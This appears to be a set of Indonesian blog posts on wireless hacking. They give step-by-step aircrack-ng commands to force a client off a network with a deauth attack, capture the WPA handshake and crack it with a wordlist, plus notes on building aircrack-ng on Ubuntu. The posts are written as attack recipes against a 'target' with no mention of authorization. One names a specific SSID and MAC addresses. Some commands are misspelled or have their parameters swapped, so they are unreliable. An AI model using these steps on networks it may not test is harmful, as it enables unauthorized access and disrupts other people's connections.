./dev/sda /tmp/backtrack, Ppentest

Hack WPA/WP2 |wireless hacking|

1.Ubah Interface jadi monitoring mode

 #airmon-ng start wlan0

2.monitoring target

#airodump-ng -c <channel> –bssid <bssid target> -w psk <interfaces>

3. buka tab baru, monitoring tab nya jangan di tutup

4. PUTUSIN koneksi target :-p

#aireplay-ng –deauth 50 -a <bssid> -c <station id> <interfaces>

Tunggu si target diskonek, sampe si target konek nanti lo dapet handshake nya.

handshake dapet, tinggal eksekusi

#airkrack-ng -w /lokasi/word/lis/nya.txt -b <bssid> psk*.cap

 

note:

-c <channel> lo isi sama chanel si target, kalo lo punya basic wireless networking paham lah yg ini mah

–deauth 50 , nilai 50 bisa lo ganti. maksudnya tu seberapa banyak paket yg dikirim biar si target diskonek.

Os yang di pake backtrack/kali. lo juga bisa pake OS lain nya, yg bin nya .deb /.rpm. tapi mesti install paketan software yang diatas. gw sendiri pake ubuntu sama fedora security.

tanda handshake udah dapet, liat di terminal yang lagi memonitoring, nanti ada tulisan handshake nya.

 

 

Semoga berhasil

Advertisements
Standard
./dev/sda /tmp/backtrack, Linux, Networking, Ppentest

[Wireless] Installare aircrack-ng in Ubuntu 12.04

sudo apt-get install build-essential
sudo apt-get install libssl-dev
wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1

Edit file common.mak

gedit common.mak

cari baris ini:
CFLAGS          ?= -g -W -Wall -Werror -O3
Hapus  -Werror , jadi kayak gini.
CFLAGS          ?= -g -W -Wall -O3

Compile

make
sudo make install

…………

DONE

Standard
Linux, Networking, Ppentest

Wireless Deauth Attack!!

#Step 1 : Aktifkan Mode Monitor airmon-ng start wlan0

Output : Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)

Ok kita telah sukses sejauh ini , output pada terminal menunjukan bahwa monitor mode telah di aktifkan pada interface mon0.

 

#Step 2 : Menangkap (dump) traffik pada akses point target dan lalu lintas paket data antara AP dan client yang sedang terkoneksi. “airodump-ng mon0”

Output:

#Step 3: HandShake

Tujuan kita dalam capturing ini sebenarnya adalah mencari handshake. Untuk mendapatkan nilai handshake kita harus mendiskoneksikan client yang sudah terkoneksi dengan baik ke AP target. ok saya tertarik pada client yang telah terkoneksi dengan AP dengan ssid ( ibteam-3g ) dengan bssid F4:EC:38:EB:FA:C6. Kita gunakan fasilitas aireply untuk melakukan deauth attack pada user dengan Mac .  1C:4B:D6:AB:85:8E  .

 

#Step 4 : Serang..!!!!!

aireplay-ng --deauth 1 -a 1C:4B:D6:AB:85:8E  . -c F4:EC:38:EB:FA:C6 mon0

Standard